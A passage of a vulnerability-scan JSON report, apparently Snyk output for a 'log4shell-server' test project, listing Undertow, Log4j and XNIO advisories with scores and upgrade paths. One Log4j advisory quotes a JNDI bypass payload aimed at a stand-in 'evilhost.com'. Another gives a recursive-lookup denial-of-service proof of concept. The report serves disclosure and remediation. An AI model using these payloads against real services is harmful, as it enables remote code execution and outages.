Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Recursion in chunked response handling. An attacker can cause a client to wait indefinitely by sending excessive data without a `0\\r\\n` termination sequence in chunked responses, thereby disrupting service to the server. 
\r\n\r\n**Note:** This is only exploitable when using `NewSessionTicket` functionality in TLS 1.3 on Java 17.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.3.8.Final or higher.\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2292211)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n", - "epssDetails": { - "percentile": "0.16001", - "probability": "0.00045", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-5971" - ], - "CWE": [ - "CWE-674" - ], - "GHSA": [ - "GHSA-xpp6-8r3j-ww43" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-07-10T07:31:06.494967Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-07-08T21:31:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-07-10T14:09:02.139513Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-17T10:19:41.285562Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.3.8.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-7433721", - "title": "Memory Leak", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", 
- "severity": "low", - "cvssScore": 2.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437", - "title": "Red Hat Bugzilla Bug" - }, - { - "url": "https://access.redhat.com/errata/RHSA-2024:4392", - "title": "Red Hat Security Advisory" - }, - { - "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562", - "title": "Vulnerable Code" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", - "assigner": "Snyk", - "severity": "low", - "baseScore": 2.3, - "cvssVersion": "4.0", - "modificationTime": "2024-07-10T14:39:24.891744Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.1, - "cvssVersion": "3.1", - "modificationTime": "2024-07-10T14:39:24.891744Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. 
An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n", - "epssDetails": { - "percentile": "0.16001", - "probability": "0.00045", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-3653" - ], - "CWE": [ - "CWE-401" - ], - "GHSA": [ - "GHSA-ch7q-gpff-h9hp" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-07-10T07:43:42.505449Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-07-09T00:31:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-07-10T14:39:24.891304Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-10T14:39:24.891744Z", - "socialTrendAlert": false, - "severityWithCritical": "low", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" 
- ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.16.0)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.1", - "2.12.2", - "2.16.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", - "title": "Apache Pony Mail" - }, - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://twitter.com/marcioalm/status/1471740771581652995", - "title": "Twitter Post" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", - "title": "Nuclei Templates" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 9, - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:32.295395Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "type": 
"secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. 
If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99913", - "probability": "0.97364", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45046" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-7rjr-3q55-vv33" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-14T18:28:31.339218Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-14T18:01:28Z", 
- "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-14T18:44:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:25.837600Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.15.0" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.16.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.15.0" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Hideki Okamoto of Akamai Technologies" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.3)", - "[2.13.0,2.17.0)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.1", - "2.12.3", - "2.17.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", - "title": "JIRA Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "assigner": 
"Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:38.288854Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! 
%m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", - "epssDetails": { - "percentile": "0.99624", - "probability": "0.96524", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45105" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-17T18:23:58.542986Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-17T18:20:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-18T07:05:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.516498Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.15.0" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.17.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.15.0" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0-beta7,2.3.2)", - "[2.4,2.12.4)", - "[2.13.0,2.17.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.2", - "2.12.4", - 
"2.17.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.6, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", - "title": "Jira Issue" - }, - { - "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", - "title": "Openwall Mail" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:47.220633Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging 
library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", - "epssDetails": { - "percentile": "0.89602", - "probability": "0.02239", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-44832" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-28T19:42:55.818691Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-28T19:42:53Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", 
- "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-28T20:17:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.472982Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.15.0" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.17.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.15.0" - }, - { - "id": "SNYK-JAVA-ORGJBOSSXNIO-2994360", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.8.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.8.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.jboss.xnio:xnio-api", - "references": [ - { - "url": "https://github.com/xnio/xnio/commit/fdefb3b8b715d33387cadc4d48991fb1989b0c12", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/xnio/xnio/pull/291", - "title": "GitHub PR" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064226", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-04-27T13:34:34.076065Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:50.426700Z" - } - ], - "cvssSources": [ - { - 
"type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:00.412483Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-04-27T13:34:34.076065Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:50.426700Z" - } - ], - "description": "## Overview\n[org.jboss.xnio:xnio-api](https://mvnrepository.com/artifact/org.jboss.xnio/xnio-api) is a simplified low-level I/O layer which can be used anywhere you are using NIO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the `notifyReadClosed` method by allowing an attacker to send flawed requests to a server, possibly causing log contention-related performance concerns or an unwanted disk fill-up.\n## Remediation\nUpgrade `org.jboss.xnio:xnio-api` to version 3.8.8 or higher.\n## References\n- [GitHub Commit](https://github.com/xnio/xnio/commit/fdefb3b8b715d33387cadc4d48991fb1989b0c12)\n- [GitHub PR](https://github.com/xnio/xnio/pull/291)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2064226)\n", - "epssDetails": { - "percentile": "0.53436", - "probability": "0.00164", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-0084" - ], - "CWE": [ - "CWE-770" - ], - "GHSA": [ - "GHSA-76fg-mhrg-fmmg" - ] - }, - "packageName": "org.jboss.xnio:xnio-api", - "proprietary": false, - "creationTime": "2022-08-28T06:46:31.563692Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-08-28T06:35:33Z", - "exploitDetails": { - "sources": [], 
- "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.jboss.xnio", - "artifactId": "xnio-api" - }, - "publicationTime": "2022-08-28T09:48:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-04-27T13:34:34.076065Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final", - "org.jboss.xnio:xnio-api@3.8.4.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.33.Final", - "org.jboss.xnio:xnio-api@3.8.16.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.jboss.xnio:xnio-api", - "version": "3.8.4.Final" - }, - { - "id": "SNYK-JAVA-ORGJBOSSXNIO-6403375", - "title": "Uncontrolled Resource Consumption", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.8.14)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.8.14" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.jboss.xnio:xnio-api", - "references": [ - { - "url": "https://github.com/xnio/xnio/commit/ffabdcdda508ef87aeadad5ca3f854e274d60ec1", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241822", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-04-27T13:45:18.043553Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": 
"Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-04-24T07:16:49.813145Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-04-27T13:45:18.043553Z" - } - ], - "description": "## Overview\n[org.jboss.xnio:xnio-api](https://mvnrepository.com/artifact/org.jboss.xnio/xnio-api) is a simplified low-level I/O layer which can be used anywhere you are using NIO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption due to the `NotifierState` function that can cause a Stack Overflow Exception when the chain of notifier states becomes problematically large, leading to a possible denial of service.\n## Remediation\nUpgrade `org.jboss.xnio:xnio-api` to version 3.8.14 or higher.\n## References\n- [GitHub Commit](https://github.com/xnio/xnio/commit/ffabdcdda508ef87aeadad5ca3f854e274d60ec1)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2241822)\n", - "epssDetails": { - "percentile": "0.10602", - "probability": "0.00044", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-5685" - ], - 